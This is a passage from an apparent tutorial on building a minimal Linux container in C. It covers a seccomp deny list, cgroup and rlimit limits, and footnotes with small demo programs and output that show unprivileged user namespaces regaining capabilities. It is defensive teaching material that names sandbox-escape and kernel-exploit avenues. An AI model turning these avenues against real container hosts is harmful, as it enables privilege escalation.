	fprintf(stderr, "done.\n");
	return 0;
}
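
pivot_root is a system call that lets us swap the mount at / with another. Glibc doesn't provide a wrapper for it, but includes a prototype. I don't really understand why, but OK, we'll include our own.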

<<pivot-root>> =

int pivot_root(const char *new_root, const char *put_old)
{
	return syscall(SYS_pivot_root, new_root, put_old);
}

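It's worth noting that I'm avoiding packing and unpacking containers. This is fertile ground for vulnerabilities [46]; I'll count on the user to make sure the mounted directory doesn't contain trusted or sensitive files or hard links.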

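System calls

I'll be blacklisting system calls that I can demonstrate causing harm or a sandbox escape. Again, this isn't the best way to do this, but it seems to me the most illustrative.

Docker's documentation and default seccomp profile are reasonable sources of dangerous system calls [47]. They also include obsolete system calls and calls that overlap with the restricted capabilities; I'll ignore these.

Disallowed system calls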

<<syscalls>> +=

#define SCMP_FAIL SCMP_ACT_ERRNO(EPERM)

int syscalls()
{
	scmp_filter_ctx ctx = NULL;
	fprintf(stderr, "=> filtering syscalls...");
	if (!(ctx = seccomp_init(SCMP_ACT_ALLOW))

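We want to prevent new setuid / setgid executables from being created, since in the absence of user namespaces the contained process could create a setuid binary that any user could use to get root [48].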

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
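
SCMP_CMP_MASKED_EQ takes a mask and a datum, and the rule matches when (argument & mask) == datum. A minimal sketch of that comparison in plain C, applied to the mode argument of chmod; masked_eq and chmod_mode_is_blocked are hypothetical names, and nothing here calls libseccomp:

```c
#include <assert.h>
#include <stdint.h>
#include <sys/stat.h>
#include <sys/types.h>

/* The comparison SCMP_CMP_MASKED_EQ performs on one syscall argument. */
int masked_eq(uint64_t arg, uint64_t mask, uint64_t datum)
{
	/* A datum with bits outside the mask could never match. */
	assert((datum & ~mask) == 0);
	return (arg & mask) == datum;
}

/* Returns 1 if a chmod() with this mode would hit one of the two chmod
 * rules above (setuid bit set, or setgid bit set), 0 otherwise. */
int chmod_mode_is_blocked(mode_t mode)
{
	return masked_eq(mode, S_ISUID, S_ISUID)
		|| masked_eq(mode, S_ISGID, S_ISGID);
}
```

Using the same value for mask and datum means "this bit is set, whatever the other bits are", which is why 04755 and 06755 are both rejected while 0755 and 01777 pass. Two separate rules are needed because a single rule with mask S_ISUID | S_ISGID and the same datum would only match when both bits are set.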

Allowing contained processes to start new user namespaces can allow processes to gain new (albeit limited) capabilities, so we prevent it.

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(unshare), 1,
				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,
				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))

TIOCSTI allows contained processes to write to the controlling terminal [49].

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ioctl), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, TIOCSTI, TIOCSTI))

The kernel keyring system isn't namespaced [50].

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)

Before Linux 4.8, ptrace breaks seccomp completely [51].

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ptrace), 0)

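These system calls let processes assign NUMA nodes. I don't have anything specific in mind, but I could see these being used to deny service to some other NUMA-aware application on the host.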

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(mbind), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(migrate_pages), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(move_pages), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(set_mempolicy), 0)

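userfaultfd allows userspace to handle page faults [52]. It doesn't require any privileges, so in theory it should be safe to be called by unprivileged users. But it can be used to pause execution in the kernel by triggering page faults in system calls. This is an important part of some kernel exploits [53]. It's rarely used legitimately, so I'll disable it.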

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(userfaultfd), 0)

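I was initially worried about perf_event_open because the Docker documentation says it "could leak a lot of information on the host", but it can't be used in our system to view information about out-of-namespace processes [54]. But if /proc/sys/kernel/perf_event_paranoid is less than 2, it can be used to discover kernel addresses and possibly uninitialized memory. 2 has been the default since 4.6, but it can be changed, and it seems like a bad idea to rely on it [55].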

<<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(perf_event_open), 0)

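We'll set PR_SET_NO_NEW_PRIVS to 0. The name is a little obscure: it specifically prevents setuid and setcap'd binaries from being executed with their additional privileges. This has some security benefits (it makes it harder for an unprivileged user in the container to exploit a vulnerability in a setuid or setcap executable to become in-container root, for example). But it's a bit weird, and means, for example, that ping won't work in a container for an unprivileged user [56].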

<<syscalls>> +=

	    || seccomp_attr_set(ctx, SCMP_FLTATR_CTL_NNP, 0)

We'll actually apply it to the process, and release the context.

<<syscalls>> +=

	    || seccomp_load(ctx)) {
		if (ctx) seccomp_release(ctx);
		fprintf(stderr, "failed: %m\n");
		return 1;
	}
	seccomp_release(ctx);
	fprintf(stderr, "done.\n");
	return 0;
}

Allowed system calls

These are the system calls that are disallowed by the default Docker policy but permitted by this code:

_sysctl is obsolete and disabled by default [57]. alloc_hugepages, free_hugepages, bdflush, create_module, nfsservctl, perfctr, get_kernel_syms, and setup don't exist on modern Linux [58-64].
clock_adjtime, clock_settime [65], and adjtime [66] depend on CAP_SYS_TIME.
pciconfig_read and pciconfig_write [67] and all of the side-effecting operations of quotactl [68] are prevented by CAP_SYS_ADMIN.
get_mempolicy and getpagesize reveal information about the memory layout of the system, but they can be made by unprivileged processes, and are probably harmless. pciconfig_iobase can be made by unprivileged processes, and reveals information about PCI devices. ustat [69] and sysfs [70] leak some information about the filesystems, but nothing that I think is critical. uselib is more or less obsolete, but is just used for loading a shared library in userspace [71].
sync_file_range2 is sync_file_range with swapped argument order [72].
readdir is mostly obsolete, but probably harmless [73].
kexec_file_load and kexec_load are prevented by CAP_SYS_BOOT [74].
nice can only be used to lower priority without CAP_SYS_NICE [75].
oldfstat, oldlstat, oldolduname, oldstat, and olduname are just older versions of their respective functions. I expect them to have the same security properties as the modern ones.
perfmonctl [76] is only available on IA-64. ppc_rtas [77], spu_create [78], spu_run [79], and subpage_prot [80] are only available on PowerPC. utrap_install is only available on Sparc [81]. kern_features is only available on Sparc64, and should be harmless anyway [82].
I don't believe pivot_root is a problem in our setup (but it could possibly be used to circumvent path-based MACs).
preadv2 and pwritev2 are just extensions to preadv and pwritev / readv and writev, which are "scatter input" / "gather output" extensions to read and write [83].

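Resources

We'd like to prevent badly-behaved child processes from denying service to the rest of the system [84]. Cgroups let us limit memory and CPU time in particular; limiting the pid count and IO usage is also useful. There's a very useful document in the kernel tree about it.

The cgroup and cgroup2 filesystems are the canonical interfaces to the cgroup system. cgroup2 is a little different, and uninitialized on my system, so I'll use the first version here.

Cgroup namespaces are a little bit different from, for example, mount namespaces. We need to create the cgroup before we enter a cgroup namespace; once we do, that cgroup will behave like the root cgroup inside of the namespace [85]. This isn't the most relevant, since a contained process can't mount the cgroup filesystem or /proc for introspection, but it's nice to be thorough.

I'll set up a struct so I don't have to repeat myself too much, with the following instructions:

Set memory/$hostname/memory.limit_in_bytes, so the contained process and its child processes can't total more than 1GB of memory in userspace [86].
Set memory/$hostname/memory.kmem.limit_in_bytes, so that the contained process and its child processes can't total more than 1GB of kernel memory [87].
Set cpu/$hostname/cpu.shares to 256. CPU shares are chunks of 1024; 256 * 4 = 1024, so this lets the contained process take at most a quarter of the CPU time on a busy system [88].
Set pids/$hostname/pids.max, allowing the contained process and its children to have at most 64 pids. This is useful because there are per-user pid limits that we could hit on the host if the contained process occupies too many [89].
Set blkio/$hostname/blkio.weight to 50, so that it's lower than the rest of the system and prioritized accordingly [90].

I'll also add the calling process to each cgroup by writing "0" to {memory,cpu,blkio,pids}/$hostname/tasks.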

<<resources>> +=

#define MEMORY "1073741824"
#define SHARES "256"
#define PIDS "64"
#define WEIGHT "10"
#define FD_COUNT 64

struct cgrp_control {
	char control[256];
	struct cgrp_setting {
		char name[256];
		char value[256];
	} **settings;
};
struct cgrp_setting add_to_tasks = {
	.name = "tasks",
	.value = "0"
};

struct cgrp_control *cgrps[] = {
	& (struct cgrp_control) {
		.control = "memory",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "memory.limit_in_bytes",
				.value = MEMORY
			},
			& (struct cgrp_setting) {
				.name = "memory.kmem.limit_in_bytes",
				.value = MEMORY
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
		.control = "cpu",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "cpu.shares",
				.value = SHARES
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
		.control = "pids",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "pids.max",
				.value = PIDS
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
		.control = "blkio",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "blkio.weight",
				/* was PIDS, which left WEIGHT unused */
				.value = WEIGHT
			},
			&add_to_tasks,
			NULL
		}
	},
	NULL
};

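Writing to the cgroups version 1 filesystem works like this [91]:

In each controller, you can create a cgroup with a name using mkdir. For memory, mkdir /sys/fs/cgroup/memory/$hostname.
Inside of that, you can write to the individual files to set values. For example, echo $MEMORY > /sys/fs/cgroup/memory/$hostname/memory.limit_in_bytes.
You can add a process tree to the cgroup by writing its pid to tasks. "0" is a special value that means "the writing process".

So I'll iterate over that structure and fill in the values.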

<<resources>> +=

int resources(struct child_config *config)
{
	fprintf(stderr, "=> setting cgroups...");
	for (struct cgrp_control **cgrp = cgrps; *cgrp; cgrp++) {
		char dir[PATH_MAX] = {0};
		fprintf(stderr, "%s...", (*cgrp)->control);
		if (snprintf(dir, sizeof(dir), "/sys/fs/cgroup/%s/%s",
			     (*cgrp)->control, config->hostname) == -1) {
			return -1;
		}
		if (mkdir(dir, S_IRUSR | S_IWUSR | S_IXUSR)) {
			fprintf(stderr, "mkdir %s failed: %m\n", dir);
			return -1;
		}
		for (struct cgrp_setting **setting = (*cgrp)->settings; *setting; setting++) {
			char path[PATH_MAX] = {0};
			int fd = 0;
			if (snprintf(path, sizeof(path), "%s/%s", dir,
				     (*setting)->name) == -1) {
				fprintf(stderr, "snprintf failed: %m\n");
				return -1;
			}
			if ((fd = open(path, O_WRONLY)) == -1) {
				fprintf(stderr, "opening %s failed: %m\n", path);
				return -1;
			}
			if (write(fd, (*setting)->value, strlen((*setting)->value)) == -1) {
				fprintf(stderr, "writing to %s failed: %m\n", path);
				close(fd);
				return -1;
			}
			close(fd);
		}
	}
	fprintf(stderr, "done.\n");

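I'll also lower the hard limit on the number of file descriptors. The file descriptor count, like the number of pids, is per-user, so we want to prevent in-container processes from occupying all of them. Setting the hard limit sets a permanent upper bound for this process tree, since I've dropped CAP_SYS_RESOURCE [92].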

<<resources>> +=

	fprintf(stderr, "=> setting rlimit...");
	if (setrlimit(RLIMIT_NOFILE,
		      & (struct rlimit) {
			.rlim_max = FD_COUNT,
			.rlim_cur = FD_COUNT,
		})) {
		fprintf(stderr, "failed: %m\n");
		return 1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}
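
Lowering a hard limit needs no privileges; only raising it again does. A minimal sketch that lowers RLIMIT_NOFILE and reads the result back; cap_fd_limit is a hypothetical helper name:

```c
#include <assert.h>
#include <sys/resource.h>

/* Lower both the soft and the hard RLIMIT_NOFILE to `count`.
 * Returns the hard limit as read back afterwards, or -1 on error. */
long cap_fd_limit(rlim_t count)
{
	assert(count != RLIM_INFINITY);
	struct rlimit wanted = { .rlim_cur = count, .rlim_max = count };
	if (setrlimit(RLIMIT_NOFILE, &wanted))
		return -1;
	struct rlimit now = {0};
	if (getrlimit(RLIMIT_NOFILE, &now))
		return -1;
	return (long)now.rlim_max;
}
```

The limit applies to the calling process and is inherited across fork and execve, which is why setting it once in the parent before clone is enough to cover the whole contained process tree. Descriptors that are already open above the new limit stay open; only new allocations are refused.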

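We'll also want to clean up the cgroup for this hostname. There is built-in functionality for this, but we would need to change system-wide values to do it cleanly [93]. Since we have the contained program waiting on the contained process, it's simple to do it this way. First we move the contained program's own process back into the root tasks; then, since the child process is finished, and leaving the pid namespace SIGKILLs its children, tasks is empty. We can safely rmdir at this point.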

<<resources>> +=

int free_resources(struct child_config *config)
{
	fprintf(stderr, "=> cleaning cgroups...");
	for (struct cgrp_control **cgrp = cgrps; *cgrp; cgrp++) {
		char dir[PATH_MAX] = {0};
		char task[PATH_MAX] = {0};
		int task_fd = 0;
		if (snprintf(dir, sizeof(dir), "/sys/fs/cgroup/%s/%s",
			     (*cgrp)->control, config->hostname) == -1
		    || snprintf(task, sizeof(task), "/sys/fs/cgroup/%s/tasks",
				(*cgrp)->control) == -1) {
			fprintf(stderr, "snprintf failed: %m\n");
			return -1;
		}
		if ((task_fd = open(task, O_WRONLY)) == -1) {
			fprintf(stderr, "opening %s failed: %m\n", task);
			return -1;
		}
		if (write(task_fd, "0", 2) == -1) {
			fprintf(stderr, "writing to %s failed: %m\n", task);
			close(task_fd);
			return -1;
		}
		close(task_fd);
		if (rmdir(dir)) {
			fprintf(stderr, "rmdir %s failed: %m\n", dir);
			return -1;
		}
	}
	fprintf(stderr, "done.\n");
	return 0;
}

Networking

Container networking is a little bit too much to explain in this space. It usually works like this:

Create a bridge device.
Create a virtual ethernet pair and attach one end to the bridge.
Put the other end in the network namespace.
For outside networking access, the host needs to be set to forward (and possibly NAT) packets.

Having multiple contained processes sharing a bridge device would mean they're both on the same LAN from the host's perspective. So ARP spoofing is a recurring issue with containers that work this way [94].

The canonical way to do this from C is the rtnetlink interface; it would probably be easier to use ip link ....

We could also limit the network usage with the net_prio cgroup controller [95].

Footnotes:

[1] “Linux User Namespaces Might Not Be Secure Enough” by Erica Windisch:

If a (real) root user has had the SYS_CAP_ADMIN capability removed, but then creates a user namespace, this capability is restored for the (fake) root user. That is, before creating the namespace, ‘mount’ would be denied, but following the creation of the user namespace, the ‘mount’ syscall would magically work again, albeit in a limited fashion. While limited in function, it’s significant enough that given a (real) root user and a kernel with user namespaces, Linux capabilities may be completely subverted.

and man 7 user_namespaces says:

The child process created by clone(2) with the CLONE_NEWUSER flag starts out with a complete set of capabilities in the new user namespace.

and “Understanding and Hardening Linux Containers” again

User namespaces also allows for ``interesting’’ intersections of security models, whereas full root capabilities are granted to new namespace. This can allow CLONE_NEWUSER to effectively use CAP_NET_ADMIN over other network namespaces as they are exposed, and if containers are not in use. Additionally, as we have seen many times, processes with CAP_NET_ADMIN have a large attack surface and have resulted in a number of different kernel vulnerabilities. This may allow an unprivileged user namespace to target a large attack surface (the kernel networking subsystem) whereas a privileged container with reduced capabilities would not have such permissions. See Section 5.5 on page 39 for a more in-depth discussion on this topic.

We can demonstrate this behavior (on a host with user namespaces compiled in) with

subverting_networking.c
/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -static  subverting_networking.c \*/
/*                   -o subverting_networking" */
/* End: */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sched.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/sockios.h>

int main (int argc, char **argv)
{
	if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) {
		fprintf(stderr, "++ unshare failed: %m\n");
		return 1;
	}
	/* this is how you create a bridge... */
	int sock = 0;
	if ((sock = socket(PF_LOCAL, SOCK_STREAM, 0)) == -1) {
		fprintf(stderr, "++ socket failed: %m\n");
		return 1;
	}
	if (ioctl(sock, SIOCBRADDBR, "br0")) {
		fprintf(stderr, "++ ioctl failed: %m\n");
		close(sock);
		return 1;
	}
	close(sock);
	fprintf(stderr, "++ success!\n");
	return 0;
}
  alpine-kernel-dev:~$ whoami
  lizzie
  alpine-kernel-dev:~$ ./subverting_networking
  ++ success!
  alpine-kernel-dev:~$

but we’re not actually that powerful.

subverting_setfcap.c
/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -lcap -static subverting_setfcap.c \*/
/*                   -o subverting_setfcap" */
/* End: */
#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <linux/capability.h>
#include <sys/capability.h>

int main (int argc, char **argv)
{
	if (unshare(CLONE_NEWUSER)) {
		fprintf(stderr, "++ unshare failed: %m\n");
		return 1;
	}
	cap_t cap = cap_from_text("cap_net_admin+ep");
	if (cap_set_file("example", cap)) {
		fprintf(stderr, "++ cap_set_file failed: %m\n");
		cap_free(cap);
		return 1;
	}
	cap_free(cap);
	return 0;
}
  alpine-kernel-dev:~$ whoami
  lizzie
  alpine-kernel-dev:~$ touch example
  alpine-kernel-dev:~$ ./subverting_setfcap
  ++ cap_set_file failed: Operation not permitted

init/Kconfig:1207@c8d2bc

config USER_NS
	bool "User namespace"
	default n
	help
	  This allows containers, i.e. vservers, to use user namespaces
	  to provide different user info for different servers.

	  When user namespaces are enabled in the kernel it is
	  recommended that the MEMCG option also be enabled and that
	  user-space use the memory control groups to limit the amount
	  of memory a memory unprivileged users can use.

	  If unsure, say N.

Ubuntu switches `CONFIG_USER_NS` on, but patches it so that unprivileged use can be disabled with a sysctl, `unprivileged_userns_clone`.

92e575e769cc50a9bfb50fb58fe94aab4f2a2bff

commit 92e575e769cc50a9bfb50fb58fe94aab4f2a2bff
Author: Serge Hallyn <redacted>
Date:   Tue Jan 5 20:12:21 2016 +0000

    UBUNTU: SAUCE: add a sysctl to disable unprivileged user namespace unsharing
    
    It is turned on by default, but can be turned off if admins prefer or,
    more importantly, if a security vulnerability is found.
    
    The intent is to use this as mitigation so long as Ubuntu is on the
    cutting edge of enablement for things like unprivileged filesystem
    mounting.
    
    (This patch is tweaked from the one currently still in Debian sid, which
    in turn came from the patch we had in saucy)
    
    Signed-off-by: Serge Hallyn <redacted>
    [bwh: Remove unneeded binary sysctl bits]
    Signed-off-by: Tim Gardner <redacted>

Debian has the same behavior:

debian/patches/debian/add-sysctl-to-allow-unprivileged-CLONE_NEWUSER-by-default.patch

From: Serge Hallyn <redacted>
Date: Fri, 31 May 2013 19:12:12 +0000 (+0100)
Subject: add sysctl to disallow unprivileged CLONE_NEWUSER by default
Origin: http://kernel.ubuntu.com/git?p=serge%2Fubuntu-saucy.git;a=commit;h=5c847404dcb2e3195ad0057877e1422ae90892b8

add sysctl to disallow unprivileged CLONE_NEWUSER by default

This is a short-term patch.  Unprivileged use of CLONE_NEWUSER
is certainly an intended feature of user namespaces.  However
for at least saucy we want to make sure that, if any security
issues are found, we have a fail-safe.

Signed-off-by: Serge Hallyn <redacted>
[bwh: Remove unneeded binary sysctl bits]
---

Grsecurity disables it entirely for users without `CAP_SYS_ADMIN`, `CAP_SETUID`, and `CAP_SETGID`.

https://grsecurity.net/test/grsecurity-3.1-4.7.9-201610200819.patch

--- a/kernel/user_namespace.c
+++ b/kernel/user_namespace.c
@@ -84,6 +84,21 @@ int create_user_ns(struct cred *new)
 	    !kgid_has_mapping(parent_ns, group))
 		return -EPERM;
 
+#ifdef CONFIG_GRKERNSEC
+	/*
+	 * This doesn't really inspire confidence:
+	 * http://marc.info/?l=linux-kernel&m=135543612731939&w=2
+	 * http://marc.info/?l=linux-kernel&m=135545831607095&w=2
+	 * Increases kernel attack surface in areas developers
+	 * previously cared little about ("low importance due
+	 * to requiring "root" capability")
+	 * To be removed when this code receives *proper* review
+	 */
+	if (!capable(CAP_SYS_ADMIN) || !capable(CAP_SETUID) ||
+			!capable(CAP_SETGID))
+		return -EPERM;
+#endif

and Arch Linux has it off.

{linux} 3.13 add CONFIG_USER_NS

Comment by William Kennington (Webhostbudd) - Sunday, 06 October 2013, 03:55 GMT

I agree with Florian, allowing non-root users to take advantage of
elevating themselves to a local root seems like a huge attack
surface. Preferably this would be a sysctl with a huge warning
attached to it when it is switched on.

Comment by Daniel Micay (thestinger) - Monday, 24 November 2014, 03:55 GMT

[...]  Arch doesn't add new features via patches. If you want to see
this feature enabled, then land something like this upstream. Note
that CONFIG_USER_NS is already enabled in the linux-grsec package
because it fully removes the ability to have unprivileged user
namespaces.

It would have been cool to include Red Hat’s patches here, but I couldn’t find them.

Most of this section is cribbed from the example at the bottom of man 2 clone.

clone_stack.c
/* -*- compile-command: "gcc -Wall -Werror clone_stack.c -o clone_stack" -*- */
#define _GNU_SOURCE
#include <sched.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define STACK_SIZE (1024 * 1024)

int child (void *_)
{
	int stack_value = 0;
	fprintf(stderr, "pre-execve, stack is ~%p\n", &stack_value);
	execve("./show_stack", (char *[]) { "./show_stack", 0 }, NULL);
	return 0;
}

int main (int argc, char **argv) {
	void *stack = malloc(STACK_SIZE);
	clone(child, stack + STACK_SIZE, SIGCHLD, NULL);
	wait(NULL);
	return 0;
}
show_stack.c
/* -*- compile-command: "gcc -Wall -Werror -static show_stack.c -o show_stack" -*- */
#include <stdio.h>

int main (int argc, char **argv)
{
	int stack_value = 0;
	fprintf(stderr, "post-execve, stack is ~%p\n", &stack_value);
	return 0;
}
  [lizzie@empress linux-containers-in-500-loc]$ ./clone_stack
  pre-execve, stack is ~0x7f3f98deefec
  post-execve, stack is ~0x7ffd14d2291c

The stack grows down on x86, so the fact that the address is higher numerically post-execve means that a new stack has been allocated.

I thought this might be undefined behavior, since `stack + STACK_SIZE` does point past the last item of the array, but point 8 of 6.5.6 [Additive operators] in ISO-9899 has us covered:

If both the pointer operand and the result point to elements of the same array object, or one past the last element of the array object, the evaluation shall not produce an overflow; otherwise, the behavior is undefined. If the result points one past the last element of the array object, it shall not be used as the operand of a unary * operator that is evaluated.

i.e., the pointer addition is valid, but dereferencing it wouldn’t be.
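
As a small sketch of that rule (not code from contained.c; the helper name `stack_top` is made up), here is the same computation done on a `char *`. The code above adds to a `void *`, which is a GNU C extension, so the sketch uses `char *` to make the quoted clause apply literally.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical helper: returns the address to hand to clone() as the child
 * stack on architectures where the stack grows down. The result points one
 * past the last byte of the allocation, which is a valid pointer value as
 * long as nothing dereferences it directly. */
char *stack_top(char *stack, size_t size)
{
	assert(stack != NULL);
	return stack + size;
}
```

Subtracting the base from the result is also well defined, which gives a cheap sanity check on the arithmetic.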

I wasn’t confident that `waitpid` was enough to wait for the process and all of its children, but when the root of a pid namespace exits, all of its children get `SIGKILL`:

man 7 pid_namespaces:

If the “init” process of a PID namespace terminates, the kernel terminates all of the processes in the namespace via a SIGKILL signal. This behavior reflects the fact that the “init” process is essential for the correct operation of a PID namespace.

Also verified this myself, before I found that:

persistent_child.c
/* -*- compile-command: "gcc -Wall -Werror -static persistent_child.c -o persistent_child" -*- */
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main (int argc, char **argv)
{
	switch (fork()) {
	case -1:
		fprintf(stderr, "++ fork failed: %m\n");
		return 1;
	case 0:;
		int fd = 0;
		if ((fd = open("persistent_child.log",
			       O_CREAT | O_APPEND | O_WRONLY,
			       S_IRUSR | S_IWUSR)) == -1) {
			fprintf(stderr, "++ open failed: %m\n");
			return 1;
		}
		size_t count = 0;
		while (count < 100) {
			if (dprintf(fd, "%zu\n", count++) < 0) {
				fprintf(stderr, "++ dprintf failed: %m\n");
				close(fd);
				return 1;
			}
			sleep(1);
		}
		close(fd);
		return 0;
	default:
		sleep(2);
		return 0;
	}
}
[lizzie@empress l-c-i-500-l]$ touch persistent_child.log 
[lizzie@empress l-c-i-500-l]$ chmod 666 persistent_child.log 
[lizzie@empress l-c-i-500-l]$ sudo strace -f ./contained -m . -u 0 -c ./persistent_child
execve("./contained", ["./contained", "-m", ".", "-u", "0", "-c", "./persistent_child"], [/* 15 vars */]) = 0
brk(NULL)                               = 0x605490
# ...
[pid   736] clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x6b68d0) = 2
strace: Process 746 attached
[pid   736] nanosleep({2, 0},  <unfinished ...>
[pid   746] open("persistent_child.log", O_WRONLY|O_CREAT|O_APPEND, 0600) = 3
[pid   746] fstat(3, {st_mode=S_IFREG|0666, st_size=4, ...}) = 0
[pid   746] lseek(3, 0, SEEK_CUR)       = 0
[pid   746] write(3, "0\n", 2)          = 2
[pid   746] nanosleep({1, 0}, 0x3fee2d718d0) = 0
[pid   746] fstat(3, {st_mode=S_IFREG|0666, st_size=6, ...}) = 0
[pid   746] lseek(3, 0, SEEK_CUR)       = 6
[pid   746] write(3, "1\n", 2)          = 2
[pid   746] nanosleep({1, 0},  <unfinished ...>
[pid   736] <... nanosleep resumed> 0x3fee2d718d0) = 0
[pid   736] exit_group(0)               = ?
[pid   746] +++ killed by SIGKILL +++
[pid   736] +++ exited with 0 +++
# ...

<<namespaces>> +=

	close(sockets[1]);
	sockets[1] = 0;
	if (handle_child_uid_map(child_pid, sockets[0])) {
		err = 1;
		goto kill_and_finish_child;
	}

	goto finish_child;
kill_and_finish_child:
	if (child_pid) kill(child_pid, SIGKILL);
finish_child:;
	int child_status = 0;
	waitpid(child_pid, &child_status, 0);
	err |= WEXITSTATUS(child_status);
clear_resources:
	free_resources(&config);
	free(stack);

A process setting its own user namespace is pretty limited [8], so the parent will wait until the child enters the user namespace, and then write a mapping to its `uid_map` and `gid_map`.

man 7 user_namespaces

	In order for  a process to write  to the /proc/[pid]/uid_map
	(/proc/[pid]/gid_map)   file,    all   of    the   following
	requirements must be met:

	1. The writing process must have the CAP_SETUID (CAP_SETGID)
	   capability in the user namespace of the process pid.

	2. The writing process must either  be in the user namespace
	   of the process pid or be  in the parent user namespace of
	   the process pid.

	3. The  mapped user  IDs (group  IDs)  must in  turn have  a
	   mapping in the parent user namespace.

	4. One of the following two cases applies:

	   *  Either   the  writing   process  has   the  CAP_SETUID
		 (CAP_SETGID) capability in the parent user namespace.

		 +  No further restrictions apply: the process can make
		    mappings to  arbitrary user IDs (group  IDs) in the
		    parent user namespace.

	   *  Or otherwise all of the following restrictions apply:

		 +  The data written to  uid_map (gid_map) must consist
		    of a  single line  that maps the  writing process's
		    effective  user ID  (group ID)  in the  parent user
		    namespace  to a  user  ID (group  ID)  in the  user
		    namespace.

		 +  The writing  process must  have the  same effective
		    user  ID  as  the  process that  created  the  user
		    namespace.

		 +  In  the case  of gid_map,  use of  the setgroups(2)
		    system call must first be denied by writing deny to
		    the /proc/[pid]/setgroups  file (see  below) before
		    writing to gid_map.

	Writes  that violate  the above  rules fail  with the  error
	EPERM.
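
To make the mechanics concrete, here is a rough sketch of what the parent has to produce before it writes: a path under /proc for the child, and a mapping line of the form "first id inside, first id outside, length". The helper names `id_map_path` and `id_map_line` are made up and are not the functions contained.c uses, and any offsets and counts you pass are your own choice. Since the parent here has CAP_SETUID in the parent namespace, the "no further restrictions" case in the rules above is the one that would apply.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Hypothetical helper: builds "/proc/<pid>/uid_map" or ".../gid_map".
 * Returns 0 on success, -1 on an unexpected file name or a short buffer. */
int id_map_path(char *buf, size_t len, pid_t pid, const char *file)
{
	assert(buf && file);
	if (strcmp(file, "uid_map") && strcmp(file, "gid_map"))
		return -1;
	int n = snprintf(buf, len, "/proc/%d/%s", (int) pid, file);
	return (n < 0 || (size_t) n >= len) ? -1 : 0;
}

/* Hypothetical helper: formats one mapping line. Each line of uid_map or
 * gid_map is "<first id inside> <first id outside> <length>". */
int id_map_line(char *buf, size_t len, unsigned inside, unsigned outside,
		unsigned count)
{
	assert(buf);
	int n = snprintf(buf, len, "%u %u %u\n", inside, outside, count);
	return (n < 0 || (size_t) n >= len) ? -1 : 0;
}
```

For instance, mapping ids 0 through 1999 inside the namespace onto 10000 through 11999 outside (numbers picked only for illustration) means writing the line "0 10000 2000" to both files.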

`gid`, `sgid`, and `egid` are separate from `group_info` in `struct cred`:

include/linux/cred.h:95@c8d2bc

/*
 * The security context of a task
 *
 * The parts of the context break down into two categories:
 *
 *  (1) The objective context of a task.  These parts are used when some other
 *	task is attempting to affect this one.
 *
 *  (2) The subjective context.  These details are used when the task is acting
 *	upon another object, be that a file, a task, a key or whatever.
 *
 * Note that some members of this structure belong to both categories - the
 * LSM security pointer for instance.
 *
 * A task has two security pointers.  task->real_cred points to the objective
 * context that defines that task's actual details.  The objective part of this
